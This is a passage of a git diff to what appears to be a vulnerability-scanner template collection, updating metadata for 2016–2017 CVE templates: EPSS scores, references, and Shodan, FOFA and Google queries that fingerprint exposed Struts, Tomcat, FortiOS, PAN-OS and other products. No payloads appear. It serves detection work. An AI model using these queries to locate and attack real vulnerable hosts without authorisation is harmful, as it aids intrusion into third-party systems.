CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 + cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* epss-score: 0.00245 epss-percentile: 0.64569 - cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: scoreme_project - product: scoreme framework: wordpress + max-request: 2 + vendor: "scoreme_project" + product: scoreme tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 1010f351b1..b31f923be3 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: sap product: netweaver - shodan-query: http.favicon.hash:-266008933 + shodan-query: + - http.favicon.hash:-266008933 + - cpe:"cpe:2.3:a:sap:netweaver" fofa-query: icon_hash=-266008933 tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 1e8267e001..f90c576be5 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2016,cve,struts,rce,apache diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 37dde34469..d0856229f4 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98392 + epss-percentile: 0.98478 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: activemq - shodan-query: cpe:"cpe:2.3:a:apache:activemq" + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 087874bbff..9250d5763e 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2016,cve,redirect,fortinet,fortios,seclists http: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index aba4c78863..b3528e4663 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2016,cve,crlf,apache,xss http: diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 07d97735ed..e7b7ebde01 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - epss-score: 0.03345 - epss-percentile: 0.91147 + epss-score: 0.04558 + epss-percentile: 0.92501 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 5b46f4904b..b770c3c4ce 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -19,11 +19,13 @@ info: cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: netgear - product: readynas_surveillance - fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login" - tags: cve,cve2016,nuuo,rce + product: "readynas_surveillance" + fofa-query: + - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"" + - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login" + tags: cve,cve2016,nuuo,rce,netgear variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 38d141f86c..275f758b3a 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -29,9 +29,18 @@ info: max-request: 6 vendor: vbulletin product: vbulletin - shodan-query: title:"Powered By vBulletin" - google-query: intext:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - title:"Powered By vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2016,cve,vbulletin,sqli,forum,edb http: diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index bbc45b58dd..b192f976ea 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 - epss-score: 0.97471 - epss-percentile: 0.99962 + epss-score: 0.97464 + epss-percentile: 0.9996 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 96c42c3ebd..95ad415b23 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - epss-score: 0.97503 - epss-percentile: 0.99977 + epss-score: 0.97504 + epss-percentile: 0.99983 cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index b621310690..9ce4a3870a 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00186 - epss-percentile: 0.55032 + epss-percentile: 0.55834 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 647d30f54d..a1eee421b9 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: spip product: spip - shodan-query: http.html:"spip.php?page=backend" + shodan-query: + - http.html:"spip.php?page=backend" + - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" tags: cve2016,cve,xss,spip diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index fcbaed68bb..dbefaf615d 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index edf26c1b1b..1e333dea18 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -15,13 +15,14 @@ info: - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html - https://www.exploit-db.com/exploits/42313/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.99027 + epss-percentile: 0.99189 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index d950a4c815..2588d607a8 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: manageengine product: servicedesk - shodan-query: http.title:"ManageEngine" + shodan-query: + - http.title:"ManageEngine" + - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2017,manageengine,lfr,unauth,tenable diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index a426bd4003..b0c1e57a3e 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: supervisord product: supervisor - shodan-query: http.title:"Supervisor Status" + shodan-query: + - http.title:"Supervisor Status" + - http.title:"supervisor status" fofa-query: title="supervisor status" google-query: intitle:"supervisor status" tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 27471932c3..51bd90b179 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40119 + epss-percentile: 0.41273 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 5f22928dd1..987a4f9a4d 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: redhat product: jboss_enterprise_application_platform - shodan-query: http.title:"jboss" + shodan-query: + - http.title:"jboss" + - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" fofa-query: title="jboss" google-query: intitle:"jboss" tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 037219d39d..7c9366a374 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: dokuwiki product: dokuwiki - shodan-query: http.title:"DokuWiki" + shodan-query: + - http.title:"DokuWiki" + - http.title:"dokuwiki" + - cpe:"cpe:2.3:a:dokuwiki:dokuwiki" fofa-query: title="dokuwiki" google-query: intitle:"dokuwiki" tags: cve,cve2017,xss,dokuwiki diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 79c0e76f41..9461b0e9ce 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 99dbd027d6..4c02fb4aa7 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -21,15 +21,21 @@ info: cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 - epss-score: 0.96878 - epss-percentile: 0.99684 + epss-score: 0.96728 + epss-percentile: 0.99659 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index fc1bc7621a..9d08904c44 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -29,8 +29,14 @@ info: max-request: 2 vendor: apache product: tomcat - shodan-query: html:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - html:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2017,cve,tomcat,apache,rce,kev,intrusive diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index f1a7dc0fed..97cf4803fb 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -20,16 +20,23 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97417 - epss-percentile: 0.99925 + epss-score: 0.97427 + epss-percentile: 0.99938 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2017,cve,oast,xxe,vulhub,solr,apache http: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 731c1e9791..7788c9c77b 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - epss-score: 0.97348 - epss-percentile: 0.99889 + epss-score: 0.97392 + epss-percentile: 0.99913 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: couchdb - shodan-query: product:"couchdb" + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: cve2017,cve,couchdb,apache,intrusive http: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 52bed4ee3f..eb64fdd13d 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 - epss-score: 0.00648 - epss-percentile: 0.78875 + epss-score: 0.00715 + epss-percentile: 0.80483 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 7034429878..e205a729d3 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: dreambox product: opendreambox - shodan-query: title:"Dreambox WebControl" + shodan-query: + - title:"Dreambox WebControl" + - http.title:"dreambox webcontrol" fofa-query: title="dreambox webcontrol" google-query: intitle:"dreambox webcontrol" tags: cve,cve2017,dreambox,rce,oast,edb diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index f49b0dfc9b..26489ef040 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -29,8 +29,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: port:10443 http.favicon.hash:945408572 - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - port:10443 http.favicon.hash:945408572 + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2017,cve,fortigate,xss,fortinet http: diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 9004855cb0..67088b4e00 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46737 + epss-percentile: 0.47671 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index d40588030d..084264db98 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive http: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 6353771b11..c9f0772cd0 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2017-15944 epss-score: 0.97314 - epss-percentile: 0.99866 + epss-percentile: 0.99875 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:"-631559155" tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks http: diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 18eff63188..91606616f1 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -14,19 +14,22 @@ info: - https://github.com/zeit/next.js/releases/tag/2.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2017-16877 - https://github.com/vercel/next.js/commit/02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.00337 - epss-percentile: 0.68302 + epss-percentile: 0.71295 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js - shodan-query: http.html:"/_next/static" + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve,cve2017,nextjs,lfi,traversal,zeit diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 27c7657e3b..91313577bd 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: laravel product: laravel - shodan-query: Laravel-Framework - fofa-query: app="Laravel-Framework" + shodan-query: + - Laravel-Framework + - cpe:"cpe:2.3:a:laravel:laravel" + - laravel-framework + fofa-query: + - app="Laravel-Framework" + - app="laravel-framework" tags: cve,cve2017,laravel,exposure,packetstorm http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 1bad04ee13..23ca6dfd9c 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.64551 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: zitec - product: emag_marketplace_connector + product: "emag_marketplace_connector" framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec flow: http(1) && http(2) diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 81239b67f7..bc5d62670a 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -23,8 +23,8 @@ info: epss-percentile: 0.642 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: amtythumb_project + max-request: 2 + vendor: "amtythumb_project" product: amtythumb framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index e4bd532644..03697cf997 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.54962 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpmailster - product: wp_mailster + product: "wp_mailster" framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster flow: http(1) && http(2) diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index cd12b0eaf6..5cca4358dc 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -21,15 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17731 cwe-id: CWE-89 - epss-score: 0.02129 - epss-percentile: 0.88972 + epss-score: 0.04196 + epss-percentile: 0.92213 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"DedeCms" - fofa-query: app="DedeCMS" + shodan-query: + - http.html:"DedeCms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + - http.html:"dedecms" + fofa-query: + - app="DedeCMS" + - app="dedecms" + - body="dedecms" tags: cve,cve2017,sqli,dedecms variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 7ee2be835e..4251897c62 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -29,9 +29,11 @@ info: max-request: 1 vendor: kentico product: kentico_cms - google-query: intitle:"kentico database setup" - shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + shodan-query: + - cpe:"cpe:2.3:a:kentico:kentico_cms" + - http.title:"kentico database setup" fofa-query: title="kentico database setup" + google-query: intitle:"kentico database setup" tags: cve2017,cve,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index c57bb085a4..6d8fd59f23 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -25,9 +25,9 @@ info: vendor: google_adsense_project product: google_adsense framework: wordpress - publicwww-query: "/wp-content/plugins/adsense-plugin/" shodan-query: http.html:/wp-content/plugins/adsense-plugin/ fofa-query: body=/wp-content/plugins/adsense-plugin/ + publicwww-query: "/wp-content/plugins/adsense-plugin/" tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project http: diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index fe6fceb759..9a56af64ac 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: contact_form_multi framework: wordpress - publicwww-query: "/wp-content/plugins/contact-form-multi/" shodan-query: http.html:/wp-content/plugins/contact-form-multi/ fofa-query: body=/wp-content/plugins/contact-form-multi/ + publicwww-query: "/wp-content/plugins/contact-form-multi/" tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 647c706979..aaed7649f7 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: contact_form framework: wordpress - publicwww-query: "/wp-content/plugins/contact-form-plugin/" shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ fofa-query: body=/wp-content/plugins/contact-form-plugin/ + publicwww-query: "/wp-content/plugins/contact-form-plugin/" tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 0e3351d0c6..1a6ff295eb 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: contact_form_to_db framework: wordpress - publicwww-query: "/wp-content/plugins/contact-form-to-db/" shodan-query: http.html:/wp-content/plugins/contact-form-to-db/ fofa-query: body=/wp-content/plugins/contact-form-to-db/ + publicwww-query: "/wp-content/plugins/contact-form-to-db/" tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 19c0261467..15e432fae8 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: custom_admin_page framework: wordpress - publicwww-query: "/wp-content/plugins/custom-admin-page/" shodan-query: http.html:/wp-content/plugins/custom-admin-page/ fofa-query: body=/wp-content/plugins/custom-admin-page/ + publicwww-query: "/wp-content/plugins/custom-admin-page/" tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 6efe86ae09..47a1fe675a 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: custom_search framework: wordpress - publicwww-query: "/wp-content/plugins/custom-search-plugin/" shodan-query: http.html:/wp-content/plugins/custom-search-plugin/ fofa-query: body=/wp-content/plugins/custom-search-plugin/ + publicwww-query: "/wp-content/plugins/custom-search-plugin/" tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18496.yaml 